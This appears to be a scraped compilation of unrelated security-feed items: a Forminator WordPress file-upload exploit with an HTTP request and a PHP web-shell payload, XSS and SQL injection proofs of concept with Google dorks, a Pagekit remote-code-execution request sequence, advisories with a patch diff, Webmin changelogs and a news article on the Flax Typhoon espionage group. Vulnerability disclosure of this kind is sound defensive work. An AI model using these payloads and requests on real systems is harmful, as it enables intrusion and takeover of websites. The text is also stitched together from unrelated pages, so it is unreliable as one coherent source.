The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

    # Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
    # Date: 2023-07-20
    # Exploit Author: Mehmet Kelepçe
    # Vendor Homepage: https://wpmudev.com/project/forminator-pro/
    # Software Link: https://wordpress.org/plugins/forminator/
    # Version: 1.24.6
    # Tested on: PHP - Mysql - Apache2 - Windows 11
    
    HTTP Request and vulnerable parameter:
    -------------------------------------------------------------------------
    POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost
    Content-Length: 1756
    sec-ch-ua:
    Accept: */*
    Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundaryTmsFfkbegmAjomne
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199
    Safari/537.36
    sec-ch-ua-platform: ""
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: wp-settings-time-1=1689794282;
    wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR
    Connection: close
    
    .
    .
    .
    .
    .
    
    ------WebKitFormBoundaryTmsFfkbegmAjomne
    Content-Disposition: form-data; name="postdata-1-post-image";
    filename="mehmet.php"
    Content-Type: application/octet-stream
    
    <?php
    $_GET['function']($_GET['cmd']);
    ?>
    
    
    
    Source Code:
    wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
    --------------------------------------------------------------------
            public function has_upload() {
    $fields = $this->get_fields();
    
    if ( ! empty( $fields ) ) {
    foreach ( $fields as $field ) {
    if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) {
    return true;
    }
    }
    }
    
    return false;
    }
    Vulnerable parameter: postdata-1-post-image
    
    and
    
    
    Source code:
    wp-content/plugins/forminator/library/fields/postdata.php:
    -------------------------------------------------------------------
    if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) {
    if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty(
    $_FILES[ $image_field_name ]['name'] ) ) {
    $file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] );
    $valid     = wp_check_filetype( $file_name );
    
    if ( false === $valid['ext'] || ! in_array( $valid['ext'],
    $this->image_extensions ) ) {
    $this->validation_message[ $image_field_name ] = apply_filters(
    'forminator_postdata_field_post_image_nr_validation_message',
    esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ),
    $id
    );
    }
    }
    }
    
    Vulnerable function: $image_field_name
    -------------------------------------------------------------------------
    
    Payload file: mehmet.php
    <?php
    $_GET['function']($_GET['cmd']);
    ?>
    -------------------------------------------------------------------------

CVE-2023-4596: OffSec’s Exploit Database Archive

A Stored Cross-Site Scripting (XSS) vulnerability in the SSH configuration tab in Usermin 2.001 allows remote attackers to inject arbitrary web script or HTML via options for the host value while editing the host options.

Add support for Amazon Linux 2023 Fix a bug in Network Configuration module when parsing network size Fix Netplan related bugs in Network Configuration module Fix a bug with initial focus in Terminal module Fix to correctly compare Webmin semantic versions Fix to suppress output from monitor.pl command Fix bugs when reading and replying to HTML email in Usermin Assets File Size File Size Webmin Usermin webmin-2.102-1.noarch.rpm 40.8 MB usermin-2....

Add support for reading gzipped email messages Add error\_stderr API Fix to show correct locale for sudo-capable users webmin/authentic-theme#1663 Fix new signing key import on Debian and derivatives Fix to check if password hash format is valid for yescrypt and SHA512 Fix print email functionality for Read User Mail module (for both Webmin and Usermin) Fix various XSS related issues Assets File Size File Size Webmin Usermin webmin-2.101-1.noarch.rpm 40.8 MB usermin-2....

Add full support for NetworkManager in Network Configuration module Add the Terminal module to Usermin Add support for WebGL in the Terminal module Add screen reader support in Terminal module Add significant improvements to read, reply and compose mail functionality Add support for loading images via the server when reading mail Add support for showing defaults for options in PHP Configuration module Add new pagination mode in Users and Groups module Fix correctly displaying bridges with Netplan in Network Configuration module Fix displaying active network interfaces in Network Configuration module Fix to consider current drive temperature in smartctl output #1881 Fix to properly stop Usermin usermin/issues/89 Fix no to add hashed password to the old password list twice Fix displaying placeholder on input to reflect strftime-style format Update Authentic theme to the latest version adding new vertical column layout Assets File Size File Size Webmin Usermin webmin-2....

Add ability to set locale in Webmin Users module for consistency Fix to preserve initial install directory when upgrading manually Fix to preserve minimal install type when upgrading manually Fix an error when make\_date is called on undefined value #1860 Fix clearing packages caches before checking for updates in status collection #1863 Update the Authentic theme to the latest version Assets File Size webmin-2.021-1.noarch.rpm 39.6 MB webmin\_2.021\_all.deb 32.5 MB webmin-2....

Add full locale support Add slave zone file format option in BIND DNS module Add support for editing ACLs in File Manager Add support to configure SSL connection for MySQL/MariaDB module Add support for compressed backups in PostgreSQL module Add support for displaying inodes too in Disk Usage in the Dashboard Add better support for CloudLinux Fix to always default to RSA key type in Let’s Encrypt requests Fix setup repository script for Oracle Fix shutdown timeout to avoid termination of running processes Fix support for SpamAssassin 4 Fix to use system default hashing format for htpasswd file Fix FastRPC issues Update the Authentic theme to the latest version, with sped-up Dashboard performance Assets File Size webmin-2....

Fix Authentic theme issue with error handling Fix Framed theme to respect selected mode in left menu Assets File Size webmin-2.013-1.noarch.rpm 39.9 MB webmin\_2.013\_all.deb 32.7 MB webmin-2.013.tar.gz 44.9 MB webmin-2.013.pkg.gz 44.3 MB

Fix to set the correct algorithm when setting up RNDC #1817 Fix the loop bug when sourcing other network configs in Debian Fix to include all Debian network config files in backups Fix to stop doing expensive package re-fetch on upgrades Add support for defining hostname for WebSocket connection Add Debian 12 support Assets File Size webmin-2.012-1.noarch.rpm 39.9 MB webmin\_2.012\_all.deb 32.7 MB webmin-2.012.tar.gz 44.9 MB webmin-2.012.pkg.gz 44.3 MB

Add ability to set shell character encoding and set TERM environmental variable in the new Terminal module Add support for editing network interfaces in include files for Debian systems Add various improvements to the old good Framed Theme Fix to change Gray Framed Theme name to Framed Theme Fix to verify and close WebSocket session, if parent session was closed Fix to remove RC4 from the list of strong ciphers Fix don’t fail LDAP user or group deletion, if they have already been deleted Fix error handling in MySQL/MariaDB Database server module when executing SQL commands Fix adding an extra server attachment field and other bugs in Read User Mail module Fix the link to release notes for Rocky Linux Fix issues with freezing and thawing dynamic reverse zones in BIND DNS Server module Fix bugs for modules granting anonymous access Fix mailbox\_idle\_check\_interval option related bugs in Dovecot module sourceforge....

Add a new Terminal module (interactive shell) Add a new setup-repos.sh script to setup Webmin repos Add to replace old Gray Theme with Virtualmin Framed Theme Add systemd improvements Add proper support for openSUSE Leap and Tumbleweed Add Linux Lite support Fix connecting to external IPv6 LDAP server Fix self-signed certificate generation Fix setting hostname using hostnamectl command on systemd systems Fix to exclude sensors with unknown temperatures Fix for FreeBSD to support Let’s Encrypt certificates requests Fix to support attachment filenames with slash in them Assets File Size webmin-2....

Add to enforce HTTP Strict Transport Security (HSTS) policy in SSL enabled mode Add better http to https redirects when SSL is enabled Add support for installing multiple versions of Webmin on systemd systems Add support for AMD CPU thermisters #1714 Add better support for Webmin minor (release) versions upgrades Add Webmin and Usermin configuration modules display minor (release) version Add Mint Linux support Add latest Authentic 20.00 theme update with number of bug fixes Fix to also restart dependent services (i....

CVE-2023-41153: webmin-changelog

TripSpark VEO Transportation-2.2.x-XP_BB-20201123-184084 NovusEDU-2.2.x-XP_BB-20201123-184084 allows unsafe data inputs in POST body parameters from end users without sanitizing using server-side logic. It was possible to inject custom SQL commands into the "Student Busing Information" search queries.

**This website uses cookies.**

We use cookies to analyze website traffic and optimize your website experience. By accepting our use of cookies, your data will be aggregated with all other user data.

Accept

CVE-2021-3262: SqlSpark: SQL Injection in TripSpark VEO Transport: CVE-2021-3262

By Deeba Ahmed
Researchers believe that this time instead of cyber espionage, Chinese threat actors may have opted for more complex information ops.
This is a post from HackRead.com Read the original post: Microsoft: Chinese APT Flax Typhoon uses legit tools for cyber espionage

**KEY FINDINGS**

*   **Microsoft has identified a Chinese government-backed APT group called Flax Typhoon.**

*   **The group has been targeting Taiwanese organizations since mid-2021.**

*   **Flax Typhoon does not rely heavily on malware to maintain persistence on the targeted networks.**

*   **Instead, the group uses tools built into the operating system and some benign software.**

*   **The group’s goal is to conduct cyber espionage and maintain access to organizations across a broad range of industries.**

Microsoft has not observed Flax Typhoon act on final objectives in this campaign, but the group’s activities could pose a threat to businesses outside Taiwan.

Microsoft Threat Intelligence Team has shared exclusive details of a newly detected Chinese government-backed Advanced Persistent Threat (APT) group Flax Typhoon’s activities. The group (aka Ethereal Panda) has been installing a network of long-term, persistent infections across Taiwanese organizations. 

It is worth noting that the group doesn’t rely too much on malware to retain persistence on the targeted networks but uses tools built into the operating system with some benign software for this purpose.

Moreover, researchers observed that the group uses the access to carry out many different activities apart from espionage, which means it is an information-gathering campaign active since mid-2021.

> “Flax Typhoon’s discovery and credential access activities do not appear to enable further data-collection and exfiltration objectives. While the actor’s observed behavior suggests Flax Typhoon intents to perform espionage and maintain their network footholds, Microsoft has not observed Flax Typhoon act on final objectives in this campaign.”
> 
> Microsoft

So far, dozens of organizations across a wide range of sectors/industries have been targeted in this campaign, indicating that this could be an extensive cyber espionage activity.

However, Microsoft believes its scope may not be limited to Taiwanese businesses in the near future. The group uses legit tools and utilities built into the Windows OS (e.g. LOLbins) for its stealthy operations, which it can reuse to target organizations outside Taiwan.  

Researchers revealed that companies may easily fall into the trap of Flax Typhoon because it uses commonplace techniques that may be overlooked by organizations. 

In its report, the tech giant noted that This APT group focuses on persistence, credential access, and lateral movement. Detecting and mitigating this threat is challenging because compromised accounts might be modified or closed, and infected systems will be isolated.

Companies/entities in the government, education, IT, and manufacturing sectors across Southeast Asia, Africa, and North America have been the targets of Flax Typhoon’s previous campaigns. 

The group prefers using the China Chopper web shell, Bad Potato and Juicy Potato privilege escalation tools, Metasploit, Mimikatz, SoftEther virtual private network (VPN) client and specializes in exploiting known vulnerabilities in publicly accessible servers and targets a range of services, including VPN, web, Java, and SQL applications.

After gaining initial access, the group uses command-line tools for establishing persistence and then deploys a VPN connection to the attacker’s C2 infrastructure. Lastly, it steals credentials and scans for further vulnerabilities using VPN access.

Flax Typhoon attack chain (Microsoft)

This isn’t the first time China has targeted Taiwan, which it considers a renegade province. The country has launched espionage and DDoS attacks against the country in the past. This time, China might want access to sensitive data as well as maintain access to organizations across the broadest range of industries.

Microsoft has notified targeted/impacted customers and is helping them secure their systems.

**RELATED ARTICLES**

1.  Microsoft warns of Nobelium hackers using FoggyWeb backdoor
2.  New Phishing Attack Spoofs Microsoft 365 Authentication System
3.  Reply URL Flaw Allowed Unauthorized MS Power Platform API Access

Microsoft: Chinese APT Flax Typhoon uses legit tools for cyber espionage

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

**ImgHosting 1.2 Cross Site Scripting**

Posted Aug 29, 2023

Authored by indoushka

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3e0de4ff80dc516a1abe50185e5807a1e503d782b2cd24457e01031368191dc0

Download | Favorite | View

**ImgHosting 1.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.2 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/pikhostinom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,046)
*   Arbitrary (16,219)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,283)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,460)
*   Encryption (2,370)
*   Exploit (52,001)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,694)
*   Local (14,460)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,339)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,816)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,796)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,973)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,543)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,777)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,844)
*   UNIX (9,301)
*   UnixWare (186)
*   Windows (6,579)
*   Other

ImgHosting 1.2 Cross Site Scripting

imax CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : imax CMS v1.0 Sql Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://i-maxinfotech.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/cafesaffronnetau/view_page.php?id={{x.id}} <=====| inject here[+]  Panel :http://127.0.0.1/cafesaffronnetau/wp-admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

imax CMS 1.0 SQL Injection

In SpringBlade V3.6.0 when executing SQL query, the parameters submitted by the user are not wrapped in quotation marks, which leads to SQL injection.

**SpringBlade vulnerable to SQL injection**

High severity GitHub Reviewed Published Aug 29, 2023 to the GitHub Advisory Database • Updated Aug 31, 2023

GHSA-62pr-54gv-vg5g: SpringBlade vulnerable to SQL injection

CVE-2023-40787

\[description\]

In SpringBlade V3.6.0 when executing SQL query, the parameters

submitted by the user are not wrapped in quotation marks, which leads to SQL injection

\[Vulnerability Type\]

SQL Injection

\[Vendor of Product\]

https://github.com/chillzhuang/SpringBlade

\[Affected Product Code Base\]

SpringBlade - V3.6.0

\[Attack Type\]

Remote

\[Discoverer\]

cyvk

CVE-2023-40787: CVE-2023-40787

Theme Volty CMS Blog up to version v4.0.1 was discovered to contain a SQL injection vulnerability via the id parameter at /tvcmsblog/single.

In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39650
*   **Published at**: 2023-08-24
*   **Platform**: PrestaShop
*   **Product**: tvcmsblog
*   **Impacted release**: <= 4.0.1 (4.0.2 fixed the vulnerability)
*   **Product author**: Theme Volty
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method TvcmsBlogSingleModuleFrontController::run() have a sensitive SQL call that can be executed with a trivial HTTP call and exploited to forge a SQL injection.

If your server do not manage correctly these HTTP headers (which will be the case for all servers not managed by a professional system administrator), you are concerned:

*   CLIENT\_IP
*   X\_FORWARDED\_FOR
*   X\_FORWARDED
*   FORWARDED\_FOR
*   FORWARDED

See recommendations if needed about this.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 4.0.1**

    --- 4.0.1/tvcmsblog/controllers/front/single.php
    +++ 4.0.2/tvcmsblog/controllers/front/single.php
    ...
        public function initContent()
        {
            $ipaddress = '';
            if (isset($_SERVER['HTTP_CLIENT_IP'])) {
                $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
            } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
            } elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
                $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
            } elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
                $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
            } elseif (isset($_SERVER['HTTP_FORWARDED'])) {
                $ipaddress = $_SERVER['HTTP_FORWARDED'];
            } elseif (isset($_SERVER['REMOTE_ADDR'])) {
                $ipaddress = $_SERVER['REMOTE_ADDR'];
            } else {
                $ipaddress = 'UNKNOWN';
            }
            $blogid = $this->blogpost['id_tvcmsposts'];
    
    -       $select_data = 'SELECT MAX(id_view) as max_id FROM `' . _DB_PREFIX_ . 'tvcmsposts_view` where `id_tvcmsposts` = ' . $blogid . ' AND `ipadress` = \'' . $ipaddress . '\' ';
    +       $select_data = 'SELECT MAX(id_view) as max_id FROM `' . _DB_PREFIX_ . 'tvcmsposts_view` where `id_tvcmsposts` = ' . (int) $blogid . ' AND `ipadress` = \'' . pSQL($ipaddress) . '\' ';
            $ans = Db::getInstance()->executeS($select_data);
    
            if (1 > $ans[0]['max_id']) {
                $dataquery = 'INSERT INTO `' . _DB_PREFIX_ . 'tvcmsposts_view`
                                    SET 
    -                                   `id_tvcmsposts` = ' . $blogid . ',
    +                                   `id_tvcmsposts` = ' . (int) $blogid . ',
    -                                    ipadress = \'' . $ipaddress . '\'';
    +                                    ipadress = \'' . pSQL($ipaddress) . '\'';
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **tvcmsblog**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   These HTTP headers are not supposed to be used on a final application, since they should be used only if REMOTE_ADDR is allowed with modules like mod\_remoteip for Apache2, so you should auto-delete them if you are not behind a well setup load-balancer or reverse proxy.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-02-10

Issue discovered during a code review by TouchWeb.fr

2023-02-10

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-02-15

The author provided a patch, but it still contains all critical vulnerabilities.

2023-04-13

Recontact PrestaShop Addons security Team to confirm versions scope by author

2023-04-13

Request a CVE ID

2023-05-19

Author provide patch

2023-08-15

Received CVE ID

2023-08-24

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   Author product page
*   National Vulnerability Database

CVE-2023-39650: [CVE-2023-39650] Improper neutralization of SQL parameters in Theme Volty CMS Blog module for PrestaShop

An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php

**Problem**

**There is a logical flaw that leads to obtaining shell access.**

**Technical Details**

*   Pagekit version: 1.0.18
*   Webserver: nginx
*   Database: mysql
*   PHP Version: 7.4

Vulnerability Path:  
app/installer/src/Controller/UpdateController.php  
Lines 32-72: downloadAction and updateAction functions  
The downloadAction function retrieves a file from a remote location to the local system.  
The updateAction function reads the downloaded file.  
Within it, the SelfUpdater function is called at app/installer/src/SelfUpdater.php.  
It includes the app/installer/requirements.php file from the remotely fetched file.  
This can lead to remote code execution.  
Based on this, constructing a zip file as follows:  
pagekit.zip

The data package is as follows

    POST /index.php/admin/system/update/download HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: keep-alive
    Content-Length: 58
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost/index.php/admin/system/update/download
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    url=constructed_zip_file&_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2
    

    POST /index.php/admin/system/update/update HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Connection: keep-alive
    Content-Length: 46
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost /index.php/admin/system/update/update
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    _csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2

Tag

#sql